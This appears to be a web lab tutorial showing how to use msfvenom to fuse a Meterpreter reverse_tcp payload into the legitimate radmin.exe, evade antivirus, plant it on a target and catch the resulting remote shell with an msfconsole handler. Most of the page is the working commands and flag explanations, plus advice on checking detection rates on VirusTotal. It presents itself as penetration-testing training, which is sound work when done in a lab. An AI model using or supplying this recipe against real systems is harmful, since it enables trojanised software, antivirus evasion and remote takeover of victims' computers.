top of page

Bypassing Antivirus using MSFVenom

When we make an exe file and plant it to target, the antivirus detects it. To avoid that, we can use MSFVenom. Here we will use MSFVenom to fuse malicious exe with a legitimate windows application exe. Let’s start the process step by step.

Deliverable:

Lab Set up

  • Virtualization using Oracle VirtualBox

  • Attacker’s System: Kali Linux

In Kali Linux --> Terminal

1. Creating a malicious exe fused with legitimate windows application radmin.exe.

~# nsfvenom –p windows/meterpreter/reverse_tcp LHOST = [IP address of attacker system] LPORT = 1337 –x /usr/share/windows-binaries/radmin.exe –k –f exe > radmin.exe

Here, msfvenom à tool to bypass antivirus

-p --> payload

windows/meterpreter/reverse_tcp --> payload used (You can use other payload)

LHOST --> Local Host (Attacker System)

LPORT --> Local Port (Attacker port for listening reverse connection)

1337 --> port number for listening reverse connection

-x --> template or custom legitimate exe

/usr/share/windows-binaries/radmin.exe --> legitimate exe to be fused

-k --> runs payload as separate file

-f --> output format to be used

exe --> output format

2. Start handler in msfconsole to handle reverse connection as we have done in previous exercise.

~# msfconsole

> use exploit/multi/handler

> set payload windows/meterpreter/reverse_tcp

> show options

> set LHOST [IP address of attacker system]

> set LPORT 1337

> exploit

3. Meanwhile plant the malicious exe file created in step 1 to target windows system. And see if the antivirus detects it as a malicious file. If not then run this exe you will get reverse meterpreter shell.


Note1: We can check if the exe file is malicious or legitimate using MD5 or SHA512 hash. As the hash value of legitimate and malicious one will differ.

For example,

~# md5sum [filename]

Or

~# sha512 [filename]

Use any of the above to compare hash of both files (i.e. malicious as well as legitimate)


Note 2: To know which Antivirus program detects this exe as malicious, we can use virustotal. Virustotal is website that has virus signatures from many leading antiviruses. For example, radmin.exe (the malicious exe created in this exercise) is detected as malicious file by around 31/57 antivirus programs (number may vary).


Note 3: Microsoft security Essentials will detect this exe as a malicious file.


4. To decrease this count further we can use Encoders (next exercise).


bottom of page